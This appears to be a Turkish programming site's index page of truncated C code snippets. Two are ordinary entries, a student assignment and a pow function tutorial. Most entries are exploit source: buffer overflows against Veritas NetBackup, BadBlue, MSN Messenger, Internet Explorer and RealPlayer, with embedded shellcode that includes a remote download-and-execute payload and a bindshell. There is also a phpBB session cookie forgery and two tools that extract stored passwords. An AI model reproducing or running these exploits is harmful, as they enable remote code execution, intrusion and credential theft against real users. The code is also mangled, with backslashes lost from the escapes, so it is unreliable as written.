163 Belge Programlama

Csit114 Term Project

Project (CSIT114) Assignment Date: 06.01.2006 Submit Date : 23.01.2006 THE PROJECT SHOULD BE SUBMITTED DURING THE FINAL WEEK BOTH ON FLOPPY AND PAPER. Write a C program for a Company called stock.cpp that uses 5 functions, creat_file(), (first create the file that the user will insert information about stock) insert_info(), (the user will input stock…

VERITAS NetBackup Remote Buffer Overflow

Targeted port : 13701/*DESCRIPTIONVeritas NetBackup Stack Overflow (tcp/13701)“Volume Manager Daemon” ModuleUSAGEC:NetBackup>nb 192.168.0.2 4444 192.168.0.200 0Veritas NetBackup v4/v5 “Volume Manager Daemon” Stack Overflow.C:NetBackup>nc 192.168.0.200 4444Microsoft Windows 2000 [versie 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.C:WINNTsystem32>INFORMATIONI wrote this just for educational purposes :).Because the buffer is only very small, I had to write small shellcode.The code is less than…

BadBlue – Remote buffer overflow

 #include <winsock2.h>#include <windows.h>#include <stdio.h>#pragma comment (lib,”ws2_32″)#define TIMEOUT 1#define VALIDSERVER “BadBlue/2.5”#define GETHEADER “HEAD HTTP/1.1 “#define HTTPSEND1 “GET /ext.dll?mfcisapicommand=”#define HTTPSEND2 “&page=index.htx HTTP/1.1 Accept: */* Accept-Language: es Accept-Encodin: gzip, deflate User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: “#define HTTPSEND3 ” Connection: Keep-Alive “#define LEN 500char shellcode[]=“xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33″“xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C”“x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE”“x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB”“xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77″“xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77″“xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77″“xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77″“xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77″“xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77″“xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77″“xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77″“xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77″“xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB” “x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C”“xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0″“x8Ax88xAFx87x03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77″“xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0″“xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB”“x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5″“x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98″“xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE”“x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77″“xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8″“x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF”“x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90″“x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74″“xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4″“xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94″“x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5″“xD3x4Ax8Cx88”;struct TARGETS {int num;char name[58];char offset[5];} targets[]= {// char offset[]=”x56x66x46x78″;…

phpBB2.0 Session Handler

  #include <stdio.h>#include <stdlib.h>#include <string.h>int main(int argc, char** argv[]) {FILE *pointer;char contenido[10000],cookie[91]=”a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22″,cookief[9]=”%22%3B%7D”, cookiec[106],cookie_false[92]=”a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D”,*pos;int p=0, i=0;if (argc!=2) {printf(“Usage: phpbb_exploit.exe user_id “);exit(0);}pointer=fopen(“cookies.txt”, “r”);if (pointer) {fread(contenido, 300, 10, pointer);fclose(pointer);} else {printf(“The file can’t be open “);exit(0);}strcpy(cookiec, cookie);strncat(cookiec, argv[1], 6);strcat(cookiec, cookief);if (pos=strstr(contenido, cookiec)) {p=pos – contenido;while (i<92) {if (cookie_false[i]!=NULL)contenido[p]=cookie_false[i];p++;i++;}}else {printf(“The file cookies.txt isn’t valid for execute theexploit or the…

MSN 6.2 OverFlow

  #include <stdio.h>#include <stdlib.h>#include <conio.h>#include <string.h>#ifdef __BORLANDC__#include <mem.h>#endif#define NOP 0x90char png_header[] =“x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52″“x00x00x00x40x00x00x00x40x08x03x00x00x00x9DxB7x81″“xECx00x00x01xB9x74x52x4Ex53″;char pngeof[] = “x90x90x90x59xE8x47xFExFFxFF”;/* Generic win32 http download shellcodexored with 0x1d by delikon (http://delikon.de/) */char shellcode[] = “xEB” “x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF”“xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13″“xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2″“xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90″“x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2″“xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48″“x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43″“x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96″“x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD”“xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47″“x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D”“x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33″“x78x65x78x1D”;FILE *di;int i = 0;short int weblength;char *web;char *pointer = NULL;char *newshellcode;/*xor cryptor*/char *Sifrele(char *Name1){char *Name=Name1;char xor=0x1d;int Size=strlen(Name);for(i=0;i<Size;i++)Name[i]=Name[i]^xor;return Name;}void main(int argc, char *argv[]){if (argc < 3){printf(“MSN…

Internet Explorer CSS Remote Buffer overflow

 #include <stdio.h>#include <string.h>#include <tchar.h>char bug[]=“x40x63x73x73x20x6Dx6Dx7Bx49x7Bx63x6Fx6Ex74x65x6Ex74x3Ax20x22x22x3Bx2F”“x2Ax22x20x22x2Ax2Fx7Dx7Dx40x6Dx3Bx40x65x6Ex64x3Bx20x2Fx2Ax22x7Dx7Dx20x20x20″;///////////////////////////////////////////////////////*shellcode :MessageBox (0,”hack ie6″,0,MB_OK);–XOR EBX,EBXPUSH EBX ; 0PUSH EBX ; 0ADD AL,0FPUSH EAX ; Msg ” Hack ie6 “PUSH EBX ;0JMP 746D8E72 ;USER32.MessageBoxA*/char shellcode[]= “x33xDBx53x53x04x0Fx50x53xE9xCBx8Dx6Dx74″“x90x90x48x61x63x6Bx20x69x65x36x20x63x73x73″;////////////////////////////////////////////////////////// return address :: esp+1AC :: start shellcode//MOV EAX,ESP//ADD AX,1AC//CALL EAXchar ret[]= “x8BxC4x66x05xACx01xFFxD0″;int main(int argc, char* argv[]){char buf[8192];FILE *cssfile;int i;printf(” Internet Explorer(mshtml.dll) , Cascading Style SheetsExploit “);printf(”…

RealPlayer File SMIL File Handling Remote buffer overflow

 #include <stdio.h>#include <stdlib.h>#include <string.h>char pre[]=“<smil> “” <head> “” <layout> “” <region id=”a” top=”5″ /> “” </layout> “” </head> “” <body> “” <text src=”1024_768.en.txt” region=”size” system-screen-size=””;char shellcode[]=/* bindshell port 13579 thx to metasploit.com 🙂restricted chars: 0x00, 0x90, 0xa0, 0x20, 0x0a, 0x0d, 0x3c, 0x3e,0x2f, 0x5c, 0x22, 0x58, 0x3d, 0x3b */“x29xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x8f”“x35x37x85x83xebxfcxe2xf4x73x5fxdcxcax67xccxc8x7a”“x70x55xbcxe9xabx11xbcxc0xb3xbex4bx80xf7x34xd8x0e”“xc0x2dxbcxdaxafx34xdcx66xbfx7cxbcxb1x04x34xd9xb4″ “x4fxacx9bx01x4fx41x30x44x45x38x36x47x64xc1x0cxd1″“xabx1dx42x66x04x6ax13x84x64x53xbcx89xc4xbex68x99″“x8exdex34xa9x04xbcx5bxa1x93x54xf4xb4x4fx51xbcxc5″“xbfxbex77x89x04x45x2bx28x04x75x3fxdbxe7xbbx79x8b”“x63x65xc8x53xbexeex51xd6xe9x5dx04xb7xe7x42x44xb7″“xd0x61xc8x55xe7xfexdax79xb4x65xc8x53xd0xbcxd2xe3″“x0exd8x3fx87xdax5fx35x7ax5fx5dxeex8cx7ax98x60x7a”“x59x66x64xd6xdcx66x74xd6xccx66xc8x55xe9x5dx02x8e”“xe9x66xbex64x1ax5dx93x9fxffxf2x60x7ax59x5fx27xd4″“xdaxcaxe7xedx2bx98x19x6cxd8xcaxe1xd6xdaxcaxe7xed”“x6ax7cxb1xccxd8xcaxe1xd5xdbx61x62x7ax5fxa6x5fx62″“xf6xf3x4exd2x70xe3x62x7ax5fx53x5dxe1xe9x5dx54xe8″“x06xd0x5dxd5xd6x1cxfbx0cx68x5fx73x0cx6dx04xf7x76″“x25xcbx75xa8x71x77x1bx16x02x4fx0fx2ex24x9ex5fxf7″“x71x86x21x7axfax71xc8x53xd4x62x65xd4xdex64x5dx84″“xdex64x62xd4x70xe5x5fx28x56x30xf9xd6x70xe3x5dx7a”“x70x02xc8x55x04x62xcbx06x4bx51xc8x53xddxcaxe7xed”“xf1xedxd5xf6xdcxcaxe1x7ax5fx35x37x85″;char end[]=” </body>”“</smil>”;char overflow[1700];int main(int argc,char *argv[]){FILE…

Manuel pow Fonksiyonu CPP

C de bildiğimiz gibi kuvvet alan bir math.h kütüphanesi fonksiyonu bulunmaktadir. hatta ismi de pow() dur. Ancak illa math.h ‘a ihtiyacımız yok bu fonk. için kendimiz gayet rahat bir şekilde tanımlayabiliriz. Nasıl mı? işte kodlar aşağıda :   #include <stdio.h>int integerPower(int,int);void main(){int base,exponent;printf(“enter the base : “);scanf(“%d”,&base);printf(” enter the exponent :”);scanf(“%d”,&exponent);printf(“%d to the power %d…

iPool Telnet Password Disclosure

 #include <stdio.h>#include <string.h>#include <windows.h>HKEY hKey;#define BUFSIZE 100char prgfiles[BUFSIZE];DWORD dwBufLen=BUFSIZE;LONG lRet;int main(){if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,“SOFTWAREMicrosoftWindowsCurrentVersion”,0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS){lRet = RegQueryValueEx( hKey, “ProgramFilesDir”, NULL,NULL,(LPBYTE) prgfiles, &dwBufLen);if( (lRet != ERROR_SUCCESS) || (dwBufLen >BUFSIZE) ){RegCloseKey(hKey);printf(“An error occured. Can’t getpassword! “);return -1;}RegCloseKey(hKey);}else{printf(“An error occured. Can’t get password! “); return -1;}printf(” iPool 1.6.81 Local Password Disclosure Exploit byKozan “);printf(“Credits to ATmaCA “);printf(“kozan@netmagister.com “);printf(“www.netmagister.com – www.spyinstructors.com…

Snooker 1.68 password disclosure

 #include <stdio.h>#include <string.h>#include <windows.h>HKEY hKey;#define BUFSIZE 100char prgfiles[BUFSIZE];DWORD dwBufLen=BUFSIZE;LONG lRet;int main(){if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,“SOFTWAREMicrosoftWindowsCurrentVersion”,0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS){lRet = RegQueryValueEx( hKey, “ProgramFilesDir”, NULL,NULL,(LPBYTE) prgfiles, &dwBufLen);if( (lRet != ERROR_SUCCESS) || (dwBufLen >BUFSIZE) ){RegCloseKey(hKey);printf(“An error occured. Can’t getpassword! “);return -1;}RegCloseKey(hKey);}else{printf(“An error occured. Can’t get password! “);return -1;}char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];strcpy(pwdfile,strcat(prgfiles,”TheSnookerClubiSnookerMyDetails.txt”));int addr, i, y;FILE *fp;char ch[100], ch2[100];if((fp=fopen(pwdfile,”rb”)) == NULL){printf(“An error occured. Can’t get…